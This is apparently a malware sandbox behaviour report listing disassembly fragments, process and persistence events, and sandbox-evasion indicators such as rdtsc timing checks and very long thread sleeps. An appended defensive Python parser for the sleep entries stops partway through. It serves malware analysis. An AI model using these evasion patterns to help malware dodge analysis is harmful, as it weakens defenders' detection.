Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00414A1A push edx; iretd 10_2_00414A2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00403350 push eax; ret 10_2_00403352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_00416BEB push edi; ret 10_2_00416BEF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0041AD21 push cs; retf 10_2_0041AD29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0042D6F3 push esi; ret 10_2_0042D7CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_0041270E push edx; ret 10_2_0041270F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_004147C9 push eax; retf 10_2_004147F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 10_2_01A409AD push ecx; mov dword ptr [esp], ecx 10_2_01A409B6
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04DC09AD push ecx; mov dword ptr [esp], ecx 12_2_04DC09B6
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02EEA3A0 push esi; ret 12_2_02EEA479
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02ECF3BB push edx; ret 12_2_02ECF3BC
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02EC7630 push ss; retf B32Ch 12_2_02EC7710
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02ED55E0 push cs; ret 12_2_02ED55E1
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02ED3898 push edi; ret 12_2_02ED389C
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02ED79CE push cs; retf 12_2_02ED79D6
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02EE091F push FFFFFFB6h; retf 12_2_02EE0921
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02EE0EFB push eax; retf 12_2_02EE0EB1
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02EE0E97 push eax; retf 12_2_02EE0EB1
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_02ED7D00 push edx; retf 12_2_02ED7D14
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04CE6668 push esp; ret 12_2_04CE66D9
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04CE73ED push eax; retf 12_2_04CE73F8
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04CEBC40 push es; ret 12_2_04CEBC45
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04CE4825 push 00000006h; iretd 12_2_04CE4852
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04CE5949 push esp; ret 12_2_04CE5954
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04CEB937 push cs; iretd 12_2_04CEB938
Source: C:\Windows\SysWOW64\iexpress.exe | Code function: 12_2_04CF0AE8 push cs; ret 12_2_04CF0AEC

                  Boot Survival

Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\iexpress.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: C:\Windows\SysWOW64\iexpress.exe API/Special instruction interceptor: Address: 7FF9B762D324
                  Source: C:\Windows\SysWOW64\iexpress.exe API/Special instruction interceptor: Address: 7FF9B762D7E4
                  Source: C:\Windows\SysWOW64\iexpress.exe API/Special instruction interceptor: Address: 7FF9B762D944
                  Source: C:\Windows\SysWOW64\iexpress.exe API/Special instruction interceptor: Address: 7FF9B762D504
                  Source: C:\Windows\SysWOW64\iexpress.exe API/Special instruction interceptor: Address: 7FF9B762D544
                  Source: C:\Windows\SysWOW64\iexpress.exe API/Special instruction interceptor: Address: 7FF9B762D1E4
                  Source: C:\Windows\SysWOW64\iexpress.exe API/Special instruction interceptor: Address: 7FF9B7630154
                  Source: C:\Windows\SysWOW64\iexpress.exe API/Special instruction interceptor: Address: 7FF9B762DA44
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 10_2_01ABD1C0 rdtsc 10_2_01ABD1C0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (4 identical entries)
                  Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1354
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1670
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3802
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5990
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3819
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4590
                  Source: C:\Windows\SysWOW64\iexpress.exe Window / User API: threadDelayed 1048
                  Source: C:\Windows\SysWOW64\iexpress.exe Window / User API: threadDelayed 8925
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe API coverage: 0.8 %
                  Source: C:\Windows\SysWOW64\iexpress.exe API coverage: 3.2 %
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7888 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7964 Thread sleep count: 3802 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968 Thread sleep count: 5990 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7996 Thread sleep time: -13835058055282155s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088 Thread sleep count: 3819 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8088 Thread sleep count: 4590 > 30
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8128 Thread sleep time: -19369081277395017s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8068 Thread sleep time: -30000s >= -30000s
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8112 Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812 Thread sleep count: 1048 > 30
                  Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812 Thread sleep time: -2096000s >= -30000s
                  Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812 Thread sleep count: 8925 > 30
                  Source: C:\Windows\SysWOW64\iexpress.exe TID: 5812 Thread sleep time: -17850000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe TID: 5816 Thread sleep time: -30000s >= -30000s
                  Source: C:\Program Files (x86)\WCAmvWxrBbedEHpgwvyxrWSwxzilbIAZzxjKyndXhU\DmMVOWsP1JSI77P.exe TID: 7728 Thread sleep time: -40000s >= -30000s
                  Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
                  Source: C:\Windows\System32\conhost.exe Last function: Thread delayed (2 identical entries)
                  Source: C:\Windows\SysWOW64\iexpress.exe Last function: Thread delayed (2 identical entries)
                  Source: C:\Windows\SysWOW64\iexpress.exe Code function: 12_2_02EDC9A0 FindFirstFileW,FindNextFileW,FindClose,12_2_02EDC9A0
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (4 identical entries)
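The thread-sleep entries above are the raw material for the "Malware Analysis System Evasion" verdict, and they carry more structure than the flat list shows. The following Python script is an added example, not part of the Joe Sandbox report and not a Joe Sandbox tool: it parses the "Thread sleep time" and "Thread sleep count" lines copied verbatim from this section, aggregates them per thread, and separates three different signals. It assumes that the values the report prints with an "s" suffix are milliseconds (the only unit under which 922337203685477 makes sense: it is 0x7FFF_FFFF_FFFF_FFFF 100 ns ticks divided by 10 000, i.e. an infinite-timeout wait, and the larger PowerShell values are exact multiples of it), and it treats each report line as an independent interval when summing. The thresholds (30 000 ms, 30 calls) are the ones the report itself compares against.

```python
"""Aggregate Joe Sandbox "Thread sleep" observations per thread and classify the delay pattern.

Added example for this report; the input below is copied from the report's
evasion section, and the interpretation of units and multiples is an assumption
stated in the comments.
"""
import re
from collections import defaultdict
from dataclasses import dataclass

# 0x7FFF_FFFF_FFFF_FFFF 100-ns ticks expressed in milliseconds: this is the
# 922337203685477 the report prints for an infinite-timeout wait. Assumption:
# the report's "s" suffix is a label and the magnitudes are milliseconds.
INFINITE_MS = (2**63 - 1) // 10_000

# Thresholds the report itself compares against ("... >= -30000s", "... > 30").
LONG_SLEEP_MS = 30_000
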